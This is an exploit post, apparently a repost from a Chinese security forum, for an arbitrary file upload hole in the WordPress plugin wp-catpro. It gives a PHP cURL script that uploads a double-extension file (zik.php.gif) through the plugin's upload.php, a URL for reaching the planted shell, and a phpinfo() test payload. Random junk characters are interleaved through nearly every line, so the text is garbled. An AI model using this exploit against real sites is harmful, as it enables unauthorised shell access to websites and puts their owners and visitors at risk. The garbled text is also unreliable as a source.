Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
$ Z1 C: t& C! B7 {: ]4 W1 `; y0 t7 z! ^#------------------------------------------------------------------------ ` L! Y) K/ o- k5 T
+ {" S9 ^/ p2 X& c0 K作者 => Zikou-16
) M# F9 M1 h) |, s& r邮箱 => zikou16x@gmail.com
0 f9 A. A& Q" m% _3 }测试系统 : Windows 7 , Backtrack 5r32 Y0 {& U ?% q, Q0 B
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip3 \" Q7 Z' N, m4 h2 S
####
( l2 {) y% [) {
2 B' m$ ^8 t$ W2 S I2 g#=> Exploit 信息:
* P2 v2 @8 u. @. Y------------------/ ?) A* [: [# O/ E; X
# 攻击者可以上传 file/shell.php.gif
2 @3 Q1 Q i- B, {# ("jpg", "gif", "png") // Allowed file extensions/ U. O* m1 T; |/ w
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
4 P! w* C4 ?6 y4 |. x4 L7 e# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)$ ^" w( j( ?: L X5 s
------------------0 s/ T* [* |% b0 r
4 P* Y& h- E1 l; G5 {#=> Exploit. v) p3 S" c4 T/ p$ x2 i' l/ Q
-----------
! e/ M) k- ]+ ?6 i7 H; [<?php
! P* g# A- b/ t
4 F! v' h: Y$ N% C# ~$uploadfile="zik.php.gif";; q, f: S4 h* ]. q$ E
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");+ y# J( J2 C9 I; ?7 |
curl_setopt($ch, CURLOPT_POST, true);, |2 ?0 ]! p q, R7 c. W
curl_setopt($ch, CURLOPT_POSTFIELDS,
0 a6 U, f) a8 c& R& p/ h4 j7 Varray('Filedata'=>"@$uploadfile",$ m, r5 p& P6 Q
'folder'=>'/wp-content/uploads/catpro/'));! ?2 `# y% ~9 m! F8 H: Y! O
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);7 g' A" y3 ` J3 d
$postResult = curl_exec($ch);: v0 ^6 t# p- s+ m/ s) c$ k
curl_close($ch);
# r2 c0 y9 t- h6 U& L ; o7 f4 M7 X& H3 g# ]/ e/ Z3 c
print "$postResult";
& }$ v$ x- W7 r/ r $ z0 P$ a- m) q$ g8 @
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
" K' Y# X2 ]$ S1 J ?>
) U7 z1 M& Q0 r: D* a<?php
( X: {6 m! P, m# S# _$ ^7 Mphpinfo();
) |7 }; _$ S. f6 \" X, o; p8 L?> |
发表于 2013-2-27 20:12:43
收藏
支持
反对